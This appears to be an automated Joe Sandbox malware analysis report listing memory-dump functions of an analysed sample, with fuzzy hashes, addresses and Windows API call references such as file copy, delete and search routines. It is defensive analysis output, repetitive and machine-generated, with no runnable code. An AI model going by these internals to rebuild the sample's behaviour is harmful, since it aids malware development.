                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &G~$(hb
                                  • API String ID: 0-1867757542
                                  • Opcode ID: b9a9177e6c1d491f13d28b3e6f6f18084aa6bb4085b26c2b282a6d155a75c6da
                                  • Instruction ID: 41884dd94268706b30c547b2d387faba4a7f86a329d8e18cac4b858071a42381
                                  • Opcode Fuzzy Hash: b9a9177e6c1d491f13d28b3e6f6f18084aa6bb4085b26c2b282a6d155a75c6da
                                  • Instruction Fuzzy Hash: 35622AF360C2049FE3046E2DEC4567ABBEAEBD4720F2A463DE6C5C3744E93598058697
                                  Function 0129C1EE Relevance: .2, Instructions: 245COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd520bf671354cabc9d598ed3417c271107c080582d7354946872773b85be4f4
                                  • Instruction ID: 6e44540430453d5af42608a8445bbce28f4e7ede2969fa4e039df600a03acc7d
                                  • Opcode Fuzzy Hash: dd520bf671354cabc9d598ed3417c271107c080582d7354946872773b85be4f4
                                  • Instruction Fuzzy Hash: B081D3B3A082149FE300AE29DC4177AF7E5EF94720F1A493DEAC4C7380E6395D458B96
                                  Function 012271D5 Relevance: .2, Instructions: 235COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a8cd54f76ef1b63723391dbbfdeccaba054b7cac4296f9694efeea5ffc085c6
                                  • Instruction ID: dcae840c88710933ccda202a83c2f12404768e769aca8c31b8b823d98c40cfe7
                                  • Opcode Fuzzy Hash: 0a8cd54f76ef1b63723391dbbfdeccaba054b7cac4296f9694efeea5ffc085c6
                                  • Instruction Fuzzy Hash: 257125F36083049FE3046E69ECD577AB7E9EF80320F1A463EEAC5C3744E97858458696
                                  Function 01333EAC Relevance: .2, Instructions: 204COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5c9c9d0b879530e2d7c7526107ade9c224945c6291fbea73feb46bcb0f93675b
                                  • Instruction ID: c4623d32bb1f5b11161272671e010e46ae1e694d959c2e72084cc7394504f831
                                  • Opcode Fuzzy Hash: 5c9c9d0b879530e2d7c7526107ade9c224945c6291fbea73feb46bcb0f93675b
                                  • Instruction Fuzzy Hash: D251CFF3D186249BE3146E28DC847AABAE5EB54721F1B463CDFD8937C0E979580086C6
                                  Function 0123E359 Relevance: .2, Instructions: 189COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6dd019cef58863ba67ef72990bdf0a956cbc74175adf7d796a33dd4ee790ca16
                                  • Instruction ID: 9bdb403f00839328f0dd87c606be84437bf3f1d14b8b3d5a5e31c2f067e717ac
                                  • Opcode Fuzzy Hash: 6dd019cef58863ba67ef72990bdf0a956cbc74175adf7d796a33dd4ee790ca16
                                  • Instruction Fuzzy Hash: 5F51A5B3A086009FE744AE19DC8177AB7E5EFD4720F168A3DE9D4C7744DA3988018697
                                  Function 012CB022 Relevance: .2, Instructions: 172COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 957f516320eba7acf7809aec71d9d793a614783476478861113a6ecd6c802df2
                                  • Instruction ID: f7175e089fdd8918944c41bc263adfe5b2ea893fbbb5a5e4be1a8cd0f6649c67
                                  • Opcode Fuzzy Hash: 957f516320eba7acf7809aec71d9d793a614783476478861113a6ecd6c802df2
                                  • Instruction Fuzzy Hash: BB5138F3A082085FE354BE2DDC4572AB7E5DB94720F0A8A3CDA89C7744E97658058782
                                  Function 012FEEF3 Relevance: .2, Instructions: 171COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bfd7c1d8a4e296f432774cf928780c5db5b67c0cc9e8b3115dd9083d1fb35996
                                  • Instruction ID: 83aab052d63fc52b1976b9850d9d848ee0d495bae04949cf01c8d630f67b0c6f
                                  • Opcode Fuzzy Hash: bfd7c1d8a4e296f432774cf928780c5db5b67c0cc9e8b3115dd9083d1fb35996
                                  • Instruction Fuzzy Hash: CD515CF3A081049BF70C6E39EC5577ABBD6EBD4320F1A453DEB85C3788E93A59054289
                                  Function 01378868 Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49124a3a8ef941fe8ae6f571beedce6733d3d6e51e19839944e7022502597ce9
                                  • Instruction ID: 0a1eebc4c4678bdcba8b5c07a67d2dbf38072309d60053b07c9099778d0562a1
                                  • Opcode Fuzzy Hash: 49124a3a8ef941fe8ae6f571beedce6733d3d6e51e19839944e7022502597ce9
                                  • Instruction Fuzzy Hash: 7F41CDB250C304AFE315AF69E885A7EFBE9FF85724F16482DE6C1C3610E67848408B57
                                  Function 0146C8FE Relevance: .1, Instructions: 115COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c4bfb138e9e67fb723d4a9e12543430e29c853364887e85cad796fb28f43ba94
                                  • Instruction ID: a4306376637a884a73541d081d31ef63f18e0cfc96b3fb241640853b12e4c857
                                  • Opcode Fuzzy Hash: c4bfb138e9e67fb723d4a9e12543430e29c853364887e85cad796fb28f43ba94
                                  • Instruction Fuzzy Hash: B0314BB364D611DBD340EA299CD027EB7EDAB84258F06082FD5C6D7220EA30481787D3
                                  Function 00FC85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00FC86AA
                                  • StrStrA.SHLWAPI(?,01B9E058), ref: 00FC86CF
                                  • lstrcpyn.KERNEL32(011E93D0,?,00000000), ref: 00FC86EE
                                  • lstrlen.KERNEL32(?), ref: 00FC8701
                                  • wsprintfA.USER32 ref: 00FC8711
                                  • lstrcpy.KERNEL32(?,?), ref: 00FC8727
                                  • StrStrA.SHLWAPI(?,01B9E088), ref: 00FC8754
                                  • lstrcpy.KERNEL32(?,011E93D0), ref: 00FC87B4
                                  • StrStrA.SHLWAPI(?,01B9DFE0), ref: 00FC87E1
                                  • lstrcpyn.KERNEL32(011E93D0,?,00000000), ref: 00FC8800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  • Opcode ID: 3581a668bd452b33a1171873d3d87f00370cbb4046aec7910e3da5e52da8a885
                                  • Instruction ID: 40c399446a6133441e5c314e69c0c40f427bc8f5f02790544c8d9e4e10c97cd9
                                  • Opcode Fuzzy Hash: 3581a668bd452b33a1171873d3d87f00370cbb4046aec7910e3da5e52da8a885
                                  • Instruction Fuzzy Hash: E2F1AE72904118AFCB24DFE4DD48ADAB7F9EF48304F0045A9F91AE7245DB34AE41DBA1
                                  Function 00FB1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1F9F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FB1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB1FE3
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB200E
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB204D
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2075
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB2081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB20AC
                                  • lstrlen.KERNEL32(?), ref: 00FB20E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2104
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB2112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2139
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB216B
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB2177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB21A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB21D4
                                  • lstrlen.KERNEL32(?), ref: 00FB21EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB2218
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2242
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB227F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FB228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB22B1
                                  • lstrcat.KERNEL32(00000000,01B9D580), ref: 00FB22B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB22F7
                                  • lstrcat.KERNEL32(00000000), ref: 00FB2304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FB2356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB23BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 00FB23F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FB2444
                                  • FindClose.KERNEL32(00000000), ref: 00FB2453
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
